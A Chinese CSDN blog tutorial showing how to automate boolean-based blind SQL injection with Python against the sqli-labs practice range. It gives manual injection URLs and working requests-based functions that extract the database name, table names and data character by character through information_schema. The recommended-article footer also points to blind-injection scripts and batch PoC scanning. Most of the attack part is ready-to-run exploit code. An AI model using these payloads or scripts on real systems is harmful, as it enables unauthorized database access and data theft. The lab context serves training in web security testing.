Python自动化sql注入:布尔盲注

已于 2023-04-23 20:49:11 修改
阅读量4.2k 收藏 19
点赞数 9
文章标签: sql web安全 安全 python
于 2023-04-22 18:21:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46145027/article/details/130293395
版权
文章介绍了如何使用Python脚本进行SQL注入,特别是针对布尔盲注的情况。首先解释了布尔盲注的特点,即没有回显和错误提示,但根据查询结果的不同会有不同的页面反馈。然后展示了手工注入的步骤,包括测试数据库名、表名和字段等。接着,通过Python脚本演示了如何自动化这个过程,利用requests库发送请求并检查回显,大大提高了效率。
摘要由CSDN通过智能技术生成

在sql注入时,使用python脚本可以大大提高注入效率,这里演示一下编写python脚本实现布尔盲注的基本流程:

演示靶场:sqli-labs

布尔盲注

特点:没有回显没有报错,但根据sql语句正常与否返回不同结果,通过语句是否正常来注入。

靶场:sqli-labs第八关

手注思路

先简单讲讲手工注入时的大概思路,sql语句如下:

 单引号就能闭合,结果正常时会显示you are in......,结果不正常什么都没有。

 所以我们只需要根据是否有you are in来判断注入成功与否,构造语句如下:

# 判断数据库名长度
/?id=1' and length((select database()))=8--+

# 挨个判断数据库名
/?id=1' and ascii(substr((select database()),1,1))=115--+
# 第一位为's'
/?id=1' and ascii(substr((select database()),2,1))=102--+
# 第二位为'e'
...

# 判断表名
/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=102--+

# 判断字段名
/?id=1' and ascii(substr((select column_name from information_schema.columns where table_name='表名' limit 1,1),1,1))=102--+

# 判断值
/?id=1' and ascii(substr((select 字段 from 表 limit 1,1),1,1))=1--+

python脚本自动化

可以看到手注需要一个一个试工作量是非常非常巨大的,这时候一个python脚本就可以很好的解放我们的双手:

需要用到requests包来建立连接访问目标地址,根据回显特征进行下一步操作,这里正确标志是"You are in...":

import requests


requests.adapters.DEFAULT_RETRIES = 5
conn = requests.session()
conn.keep_alive = False
flag = 'You are in...'

获取数据库相关信息:

def GetDBName(url):
    DBName = ''
    print("开始获取数据库名长度...")
    len = 0
    for l in range(1,99):
        payload = f"' and length((select database()))={l}--+"
        res = conn.get(url=url+payload)
        if flag in res.content.decode("utf-8"):
            print("数据库名长度为:"+str(l))
            len = l
            break
    print("开始获取数据库名...")
    for i in range(1, len+1):
        for j in range(33,127):
            payload = f"' and ascii(substr((select database()),{i},1))={j}--+"
            res = conn.get(url=url+payload)
            if flag in res.content.decode("utf-8"):
                DBName += chr(j)
                print(DBName)
                break
    return DBName

将payload与网址进行拼接,使用requests包来访问网站,根据返回页面是否有flag出现来确认是否成功。运行结果如下所示:

 接下来就是获取表、字段以及其中的具体数据了,写下去你会发现总体流程都是一样的,以表为例,大致步骤如下:

获取数量(有多少张表)--> 获取每张表表名的长度 --> 获取具体的表名

代码如下:

def GetTables(url,db):
    print("正在获取数据表数量")
    tnum = 0
    t_len = 0
    tname = ""
    for i in range(1,50):
        payload = f"'and (select count(*)table_name from information_schema.tables where table_schema=database())={i}--+"
        res = conn.get(url=url + payload)
        if flag in res.content.decode("utf-8"):
            tnum = i
            print(f"共有{i}张表")
            break
    for i in range(0,tnum):
        for n in range(1,50):
            payload = f"'and length(substr((select table_name from information_schema.tables where table_schema=database() limit {i},1),1))={n}--+"
            res = conn.get(url=url + payload)
            if flag in res.content.decode("utf-8"):
                print(f"第{i+1}张表的长度为{n}")
                t_len = n
                break
        for l in range(1,t_len+1):
            for j in range(33,127):
                payload = f"' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {i},1),{l},1))={j}--+"
                res = conn.get(url=url + payload)
                if flag in res.content.decode("utf-8"):
                    tname += chr(j)
                    print(tname)
                    break
        tname += ','
    result_list = tname[:-1].split(",")
    return result_list

运行结果像这样:

 剩下的部分除了payload基本上和获取表信息一模一样,可以自己尝试一下。

完整脚本放在这里了,仅供参考:布尔盲注python脚本资源-CSDN文库

plexming
关注
布尔盲注.py_sql盲注python_
10-03
一个简单的sql注入盲注python脚本,其中语句需要根据环境条件做改变
Python 安全开发 布尔盲注脚本
YouthBelief的博客
12-03 1281
python开发-批量fofa+poc验证0x00 思路0x01 脚本编写1.fofa爬取步骤一:请求搜索地址 以 GlassFish 任意文件读取 为例 0x00 思路 要想批量验证漏洞是否存在需要考虑的点: 1.获取可能存在漏洞的地址信息。 1.1可借助fofa获取目标 影响版本是 <= 4.1.1 fofa指纹 "GlassFish" && port="4848" && country="CN" 或者 "GlassFish" && port
Sql盲注脚本
最新发布
qq_61740845的博客
08-31 292
【代码】Sql盲注脚本
SQL注入——布尔盲注 / Python 脚本爆破
weixin_51559599的博客
11-06 1120
phpstudy 的数据库交互太慢,改用 xampp,但 xampp 中无数据库 ‘cms’ ,需要将 phpstudy 中的 cms 数据库导入 xampp 中的数据库(phpstudy 和 xampp 使用的不是同一个数据库)页面中有布尔类型的状态,可以根据布尔类型状态,对数据库中的内容进行判断。登录数据库,创建 cms 数据库,进入 cms 数据库,导入数据库。未返回新闻页面,说明数据库名第一个字母不为 “s”可知,当后面的语句为真时,显示新闻页面。多次判断,最后可知数据库名长度为3。
sql注入-布尔盲注脚本
m0_58853680的博客
01-03 478
获取cms_users表中的username和password字段的值,并用冒号分隔(使用。USER_AGENT:模拟浏览器请求时使用的User-Agent头信息。实时打印已获取的部分数据库名,并在获取完整个名字后显示最终结果。若成功获取到长度不为None,则调用get_database_获取名为cms_users表的所有列名(同样使用group_接收一个参数content_length表示数据库名的长度。该函数利用SQL注入漏洞尝试获取数据库名或表名的长度。获取当前数据库中的所有表名(使用group_
python脚本实现布尔盲注
求大佬师傅带
04-28 1006
相信师傅们在平常渗透测试中,偶尔会遇到布尔盲注的情况,但是手工的话太慢,上sqlmap流量又太大,特征太明显。所以用python脚本就是最优解,可以自定义user-agent等字段,注入速度等。
python布尔盲注脚本
kiihuang的博客
03-28 538
使用python,编写一个可以自动爆破的布尔盲注脚本,根据不同情况调整里面的Content-Length的值。
Python自动化sql注入布尔盲注_布尔盲注脚本
2401_83739411的博客
04-07 992
学好 Python 不论是就业还是做副业赚钱都不错,但要学会 Python 还是要有一个学习规划。最后大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!
sql注入布尔盲注-脚本
星空下de青铜
05-05 3008
sql注入布尔盲注-脚本 先给大家普及一下 在MySQL中,把 information_schema 看作是一个数据库,确切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。 information_schema数据库常用表说明: SCHEMATA表:提供了当前mysql实例中所有数据库的信息。如show databases就是在这查询的 TABLES表:提供了关于数据...
SQL注入-布尔盲注脚本-注释版
dasdasdasvsdV的博客
08-03 176
【代码】SQL注入-布尔盲注脚本
pythonsql注入步骤_python 打造一个sql注入脚本 (一)
weixin_39809168的博客
11-30 544
0x00前言:昨天刚刚看完小迪老师的sql注入篇的第一章所以有了新的笔记。0x01笔记:sql注入原理:网站数据传输中,接受变量传递的值未进行过滤,导致直接带入数据库查询执行的操作。sql注入对渗透的作用:获取数据sql注入特性:攻击方法由数据库类型决定攻击结果由数据库决定漏洞代码:sql.php当我们在网页执行访问了:http://127.0.0.1/sql.php?x=1在数据库其实是这样的$...
SQL注入之基于布尔盲注详解
09-10
首先说明的盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入盲注一般分为布尔盲注和基于时间的盲注。这篇文章主要讲解的是基于布尔盲注。下面来一起看看吧。
布尔盲注python脚本.zip
12-28
布尔盲注(Boolean-Based Blind Injection)是一种常见的SQL注入攻击方式,它主要针对那些不返回完整查询结果或不显示任何错误信息的Web应用程序。在这种类型的注入中,攻击者通过观察服务器响应时间或状态来判断SQL...
Python之路 | 布尔盲注、延时EXP编写
IerkeU的博客
03-29 941
什么是POC、EXP、payload? 答: ​ POC: ​ 全称为‘Proof of concept’,意为概念验证,常指为一段漏洞的证明代码 ​ 理解为:发现可能存在的漏洞后,强调对漏洞是否存在进行验证 ​ EXP: ​ 全称为‘Exploit’,意为利用,指利用系统漏洞进行攻击的动作 ​ 理解为:对已存在的漏洞进行利用,强调利用已有的资源 ​ Payload: ​ 意为有效载荷,指成功exploit之后,真正在目标系统执行的代码或指令 ​ 理解为例如使用了一条恶意SQL语句,使网站出现报
《网络安全自学教程》- SQL注入之时间盲注原理+步骤+实战操作
热门推荐
wangyuxiang946的博客
05-21 1万+
这篇文章为大家解析时间盲注的实现原理,结合实战案例讲解时间盲注的操作步骤以及时间误差的判断
写一个布尔盲注脚本
weixin_35752645的博客
01-01 541
布尔盲注是一种数据库攻击技术,其目的是通过查询数据库并猜测结果来确定特定信息。布尔盲注的基本原理是,通过提交查询并猜测其真假,从而获取有关数据库中存储的信息的提示。 如果要写一个布尔盲注脚本,你需要以下步骤: 建立与数据库的连接。 编写 SQL 语句,并将其提交给数据库。 处理数据库的响应。如果响应为真,则可以推断出查询的条件是真的;如果响应为假,则可以推断出查询的条件是假的。 根据获得的信息,...
sql注入 布尔盲注基础脚本
树木常青的博客
03-03 1106
基础SQL注入过了一遍,盲注一直不太熟,在sqli-labs上练习时也是找到注入点后上sqlmap。今天学习用pythonsql注入脚本,才发现很多语句不熟,从网上找了一篇教程,自己照着写了写,有些地方自己改了改,感觉收获很大。[这是参照的文章](https://www.cnblogs.com/lzlzzzzzz/p/13998552.html 以sqli-labs第八关为例写的 爆数据库名和表名 import requests s = reques...
CTFHUB——SQL布尔盲注自动化脚本的实现
wuuconix's blog
08-27 1935
背景 很久以前做过布尔盲注的题目,但是当时用的是网上的代码,跑出来flag了也是一知半解,没有收获。 今天花了一下午的时间写了一个布尔盲注脚本。 介绍 布尔盲注使用场景的特征十分明显,即界面不会给出查询的具体结果,也不会给你报错信息。而只会告诉你查询成功还是查询失败。 这就需要我们去利用一些神奇的函数比如substr,ascii,length来猜测。 猜测什么呢?首先猜测数据库的长度,知道了长度,就去猜数据库每个字符。知道了数据库,就去猜数据表的个数,表名长度,具体表名等等等等。也就是所有的一切都是你需要
python实现sql布尔盲注
10-12
SQL布尔盲注是一种利用SQL注入漏洞的攻击方式,通过构造特定的SQL语句,判断某个条件是否成立,从而获取数据库中的信息。Python可以通过requests库发送HTTP请求,用布尔盲注进行攻击。 以下是一个简单的Python代码示例: ```python import requests url = "http://example.com/index.php?id=1' and substring(database(),1,1)='a' --+" response = requests.get(url) if "some text" in response.text: print("True") else: print("False") ``` 在上面的代码中,我们构造了一个SQL语句,判断数据库名的第一个字符是否为'a'。如果返回的响应中包含了"some text",则说明条件成立,否则条件不成立。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值